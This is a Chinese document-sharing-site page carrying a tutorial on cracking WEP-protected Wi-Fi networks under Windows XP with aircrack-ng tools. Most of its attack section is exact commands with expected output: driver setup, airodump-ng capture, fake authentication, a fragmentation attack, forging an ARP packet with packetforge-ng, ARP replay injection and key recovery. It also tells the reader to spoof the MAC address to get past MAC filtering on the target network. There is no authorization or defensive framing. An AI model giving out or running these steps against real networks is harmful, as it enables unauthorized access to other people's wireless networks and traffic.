第一范文网 - 专业文章范例文档资料分享平台

airrack和注入式攻击来破解WEP

来源:用户分享 时间:2025/6/16 2:47:57 本文由loading 分享 下载这篇文档手机版
说明:文章内容仅供预览,部分内容可能不全,需要完整文档或者需要复制内容,请下载word后使用。下载word有问题请添加微信号:xxxxxxx或QQ:xxxxxx 处理(尽可能给您提供完整文档),感谢您的支持与谅解。

这篇文章是介绍怎么在Windows xp下面使用airrack和注入式攻击来破解WEP

准备:

一. 首先你需要正确安装网卡驱动: 如果你的网卡不被commview支持的话,那么你需要安装wildpackets的驱动。

Commview所支持的网卡http://www.tamos.com/products/commwifi/adapterlist.php

1. 如果你的网卡被commview支持的话,那么点下面的地址下载驱动:

http://www.tamos.com/bitrix/redirect.php?event1=download&event2=commwifi&event3=&goto=/files/ca5.zip

2. 如果不被commview支持的网卡则可以下载widpackets的驱动:

http://www.wildpackets.com/support/downloads/drivers

注意:下面的教程是在你正确安装commview的驱动的前提下进行的!

二.

你需要下载这个.dll文件(只适用于commview的网友): http://darkircop.org/commview.dll

三. 你需要下载aircrack压缩包:

http://download.aircrack-ng.org/aircrack-ng-1.0-rc1-win.zip

四. 解压aircrack压缩包到你的任意硬盘根目录,在这里我是解压到c盘

五. 把B下载到的commview.dll 放到D解压的文件夹,应该放到目录c:\\aircrack\\

六. 去目录c:\\program files\\commview for wifi\\(注意这个目录是安装完commview以后才会有,也就是A1你下载的文件),然后找到”ca2k.dll”文件,把”ca2k.dll”, 拷贝到(c:\\aircrack).

当你完成以上准备以后,就可以开始正式的破解了!

破解:

1:打开一个命令提示符 (开始>运行> cmd.exe) 2:在命令提示符窗口下面输入: Cd c:\\aircrack

按下回车

3 在命令相同的提示符窗口下面输入: airserv-ng -d commview.dll 按下回车

你看到的回复应该跟下面一样: Opening card commview.dll Setting chan 1

Opening sock port 666

Serving commview.dll chan 1 on port 666

如果你没有看到上面的结果的话,而是看到下面的结果的话:

注意这里可能会有两种情况出现!!!!!: (1)

\Adapter not found

get_guid()

airserv-ng: wi_open(): No error\这种情况那么你可以试试这个命令: airserv-ng -d \然后你可能会看到下面的结果

Opening card commview.dll|debug

Name: [CommView] ProximORiNOCO 802.11b/g ComboCard Gold 8470

get_guid: name: {15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82} desc: ORiNOCO 802.11bg Co mboCard Gold - Paketplaner-Miniport

Adapter not found

get_guid()

airserv-ng: wi_open(): No error

那么你只要输入下面的命令就可以了

airserv-ng -d \

或者会自动搜寻网卡,然后提示你是不是这个网卡,然你选yes/no,那么你需要选择yes就可以了

(2)\F1

init_lib()

airserv-ng: wi_open(): No error\

这种情况的话,那么你应该是由于安装了,windpackets驱动而产生的问题,那么建议你安装commview驱动,如果可能的话.

实例:

破解AP的ESSID = wifi16

破解AP的BSSID = 11:22:33:44:55:66

破解AP的CHANNEL=6

自己用于监听网卡的MAC = 01:23:45:67:89:01

1.首先监听AP

airodump-ng --channel 6 --write Filename 127.0.0.1:666

2.建立虚拟连接:

aireplay-ng -1 0 -e wifi16 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666

如果一切正常的话那么你会得到下面的回复: Sending Authentication Request Authentication successful Sending Association Request Association successful

如果你得到:

AP rejects the source MAC address

这说明你AP设置了MAC过滤,那你需要把你的 MAC地址改成破解网络允许的地址.

如果你持续得到:

sending authentication request

那么说明你离破解网络太远了,信号太弱,你需要离破解网络跟进一点,以获得更好的信号.

3.利用-5碎片攻击模式进行攻击

aireplay-ng -5 -b 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666

如果成功将会得到一个xor文件,例如文件为fragment-0124-161129.xor

4.利用packetforge-ng构造一个用于注入的arp包

packetforge-ng -0 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 -k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor -w myarp

5.利用-2的arp注入攻击模式进行注入

aireplay-ng -2 -r myarp 127.0.0.1:666

6.利用aircrack来破解WP

aircrack-ng -n 64 Filename.cap

搜索更多关于: airrack和注入式攻击来破解WEP 的文档
airrack和注入式攻击来破解WEP.doc 将本文的Word文档下载到电脑,方便复制、编辑、收藏和打印
本文链接:https://www.diyifanwen.net/c94hac046163y3j84w1ex_1.html(转载请注明文章来源)
热门推荐
Copyright © 2012-2023 第一范文网 版权所有 免责声明 | 联系我们
声明 :本网站尊重并保护知识产权,根据《信息网络传播权保护条例》,如果我们转载的作品侵犯了您的权利,请在一个月内通知我们,我们会及时删除。
客服QQ:xxxxxx 邮箱:xxxxxx@qq.com
渝ICP备2023013149号
Top